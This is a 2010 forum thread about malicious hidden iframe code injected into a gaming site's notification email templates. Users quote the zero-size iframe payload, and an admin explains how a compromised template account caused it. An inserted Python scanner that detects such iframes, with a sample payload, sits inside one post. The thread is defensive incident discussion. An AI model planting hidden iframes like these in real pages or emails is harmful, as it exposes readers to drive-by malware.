Damn those untrustworthy scoundrels...

Discussion in 'UHall' started by Llewen, Jun 9, 2010.

  1. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    edit again: Last edit I hope. Apparently the problem was with an account that had access to the email templates. I'm guessing a weak password that was brute forced or something of that nature. Anyway, the problem is cleared up. Please return to the flames and festivities...

    ***

    I'm getting code injected into the subjects of emails I'm receiving from Stratics again. I don't know who to send this to, or I would use a pm to say this, but you need to shut the boards down, clean up the mess, and for the gods' sake, find a patch for the vulnerability that's allowing this to happen, or code a fix for it yourself.

    I don't know what webserver software your host is using, but if Apache is being used, ModSecurity with the GotRoot rules set from Atomicorp is something you might want to look into.

    ***

    edit: I'm not receiving the corrupted emails anymore, and I have found no trace of the url in question or the iframes in the forums, so it's safe to say that this time it wasn't anywhere near as serious as it was the last time.
     
  2. Re: Stratics has been hacked again

    If you're using Apache and you get hacked, you should never be allowed near a server again.

    If you're using IIS and you do or don't get hacked, you should never be allowed near a server again.
     
  3. phantus

    phantus Stratics Legend
    Stratics Veteran Stratics Legend

    Joined:
    Jun 11, 2003
    Messages:
    8,369
    Likes Received:
    10
    Re: Stratics has been hacked again

    There is nothing wrong with IIS. It can be secured if you know what the hell you are doing and don't rely on a tool to do it for you.
     
  4. kelmo

    kelmo Old and in the way
    Professional Stratics Veteran Alumni Dread Lord

    Joined:
    May 12, 2008
    Messages:
    17,380
    Likes Received:
    4,702
    Re: Stratics has been hacked again

    What emails are you receiving from Stratics? Be specific please.
     
  5. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    Unfortunately with IIS you need a post graduate degree from Microsoft to "know what the hell you are doing"...
     
  6. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    I pm'd Petra with the details. The emails are the reply notifications for threads I am subscribed to. This is the code (url defaced):

    Code:
    <iframe src=http://***.com/data/readme.htm width=0 height=0></iframe>
    It's in the subject lines of the emails, and all through the emails, just like it was before. Note that it is a different url, but it is also WoW related.
     
  7. Black Sun

    Black Sun Grand Poobah
    Stratics Veteran Alumni

    Joined:
    Mar 19, 2003
    Messages:
    5,361
    Likes Received:
    19
    Re: Stratics has been hacked again

    Just noticed it on an email I got too. I sent George a PM on staff boards. Hopefully they can catch it quick.
     
  8. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    The Stratics boards should be disabled.
     
  9. kelmo

    kelmo Old and in the way
    Professional Stratics Veteran Alumni Dread Lord

    Joined:
    May 12, 2008
    Messages:
    17,380
    Likes Received:
    4,702
    Re: Stratics has been hacked again

    Stratics is not harming my computer.
     
  10. Black Sun

    Black Sun Grand Poobah
    Stratics Veteran Alumni

    Joined:
    Mar 19, 2003
    Messages:
    5,361
    Likes Received:
    19
    Re: Stratics has been hacked again

    I've not had any problems from any of the hack attempts either. Just a bunch of ugly frames to look at while browsing the forums.

    Still, hope they can catch it early.
     
  11. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    Well typically with these things if Windows and your web browser are fully updated, you should be ok. However, it would still be my recommendation that the boards be disabled until the problem is fixed. I'm not worried about it myself, but there are still those who are less on top of their updates that could be vulnerable if they accidentally click the link.

    It might even be possible for the link to load without it being clicked on. I know I just blocked the url with NoScript, so it is definitely trying to upload a script to my browser.

    edit: Scratch that, with an iframe the link will load without your consent, including any scripts which are a part of the accompanying code, without you having to click on the link if you aren't using something like NoScript.
     
  12. Viper09

    Viper09 Grand Poobah
    Stratics Veteran

    Joined:
    May 16, 2008
    Messages:
    6,680
    Likes Received:
    824
    Re: Stratics has been hacked again

    I haven't noticed anything so far.
     
  13. Beer_Cayse

    Beer_Cayse Guest

    Re: Stratics has been hacked again

    Me neither ... am at work: XP/SP2, Firefox with AdBlock Plus. I'll also try from home and report, but if like last time, nothing will occur at this point.
     
  14. Beastmaster

    Beastmaster Guest

    Re: Stratics has been hacked again

    Llewen,

    Thanks for the heads up. Some of us like to browse here from work and these continued threats make it a dangerous proposition for some. In my case I have limits of use at work I must adhere to or face termination. If my PC flags a virus I'll have to explain it. Stratics has always been a safe bet for me in the past but I'm going to have to reconsider now. BTW, I'm not at work at the moment so I'm safe. My own PCs are much better protected than my work PC.
     
  15. Taylor

    Taylor Former Stratics CEO (2011-2014)
    Professional VIP Stratics Veteran Supporter Alumni Campaign Benefactor Alumni

    Joined:
    Oct 21, 2008
    Messages:
    8,023
    Likes Received:
    1,714
    Re: Stratics has been hacked again

    Nothing here either.
     
  16. Black Sun

    Black Sun Grand Poobah
    Stratics Veteran Alumni

    Joined:
    Mar 19, 2003
    Messages:
    5,361
    Likes Received:
    19
    Re: Stratics has been hacked again

    As far as I can tell it's attached to automatically generated emails. However, the test email I sent myself had it attached, but a more recent report that I got on another post was free of any problems.
     
  17. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    I just ran the code from the website and didn't find the url, so it definitely isn't as bad as it was a few weeks ago.
     
  18. George

    George Guest

    Re: Stratics has been hacked again

    Hi guys, I just cleaned out all the email templates that contained the iframe code.

    To be clear, Stratics was not hacked again. The database was clean. What happened was the templates got hacked by an account that had access to them, and that hole is now plugged.

    In the future, please contact myself, Petra or any admin with this. We will respond as quickly as possible. It really does more harm than good by starting inflammatory threads like this one.

    After the problem is understood and fixed, or if we cannot fix it quickly, then is the right time to tell everyone.
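
An added example, not part of the post above and not Stratics' own code: a check that flags any `<iframe>` found in stored notification email templates, the kind of template tampering described in this thread. The template names, their contents and the `example.invalid` host are constructed for illustration.

```python
from html.parser import HTMLParser
import re


class _IframeFinder(HTMLParser):
    """Collects every <iframe> start tag with its attributes and line number."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.hits.append((self.getpos()[0], dict(attrs)))


def _is_hidden(attrs):
    """True for 0/1-pixel frames or frames hidden through inline CSS."""
    for dim in ("width", "height"):
        if (attrs.get(dim) or "").strip().rstrip("px") in ("0", "1"):
            return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return bool(re.search(r"display:none|visibility:hidden", style))


def scan_templates(templates):
    """Return one finding per iframe; notification templates should have none."""
    findings = []
    for name, text in templates.items():
        finder = _IframeFinder()
        finder.feed(text)
        finder.close()
        for line, attrs in finder.hits:
            findings.append({"template": name, "line": line,
                             "src": attrs.get("src"),
                             "hidden": _is_hidden(attrs)})
    return findings


# Constructed sample templates (hypothetical names and placeholder host).
_BAD = "<iframe src=http://injected.example.invalid/data/readme.htm width=0 height=0></iframe>"
SAMPLE_TEMPLATES = {
    "reply_notification.subject": "Reply to thread {title}" + _BAD,
    "reply_notification.body": "Hello {username},\n" + _BAD + "\nA new reply was posted.",
    "welcome.body": "Hello {username},\nThanks for registering.",
}

if __name__ == "__main__":
    for f in scan_templates(SAMPLE_TEMPLATES):
        print(f"{f['template']}:{f['line']} iframe src={f['src']} hidden={f['hidden']}")
```

Running a check like this on every template save, and alerting on any finding, catches the tampering before the next batch of notification emails goes out.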
     
  19. wanderer1origin

    wanderer1origin Lore Master
    Stratics Veteran Stratics Legend

    Joined:
    May 26, 2005
    Messages:
    1,064
    Likes Received:
    48
    Re: Stratics has been hacked again

    Isn't that like having a rabid animal in the neighborhood and not alerting anyone till it is caught!!!
     
  20. Taylor

    Taylor Former Stratics CEO (2011-2014)
    Professional VIP Stratics Veteran Supporter Alumni Campaign Benefactor Alumni

    Joined:
    Oct 21, 2008
    Messages:
    8,023
    Likes Received:
    1,714
    Re: Stratics has been hacked again

    Nope.
     
  21. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    I kinda want to know why I can be on here for months and not see a pop up, but then times like today I click on Uhall and get a random ass pop up ad.
     
  22. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    Well to be perfectly honest, that was the reason why I chose to post a thread, rather than just sending a pm. Beyond the fact that there is no guarantee the mod I send a pm to is going to view my pm in a timely fashion, I happen to be of the opinion that if there is a problem it is better for people to know about it so that they can take precautions if they feel it is necessary. That was the reason why I also posted immediately in the Ultimate Online forums.
     
  23. TheScoundrelRico

    TheScoundrelRico Stratics Legend
    Stratics Veteran Alumni Stratics Legend Secret Society

    Joined:
    Aug 12, 2001
    Messages:
    35,539
    Likes Received:
    908
  24. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    Re: Stratics has been hacked again


    Was that a typo of sorts?
     
  25. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    No it was not... A.K.A. UO Forums.
     
  26. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    was just checking :)
     
  27. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    ... :)
     
  28. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    fine fine! sorry for asking =(
     
  29. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    *sigh*

    I think I need to go to bed...

    *yawns*
     
  30. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    but slap happy forum posting is the next best thing to drunk dialing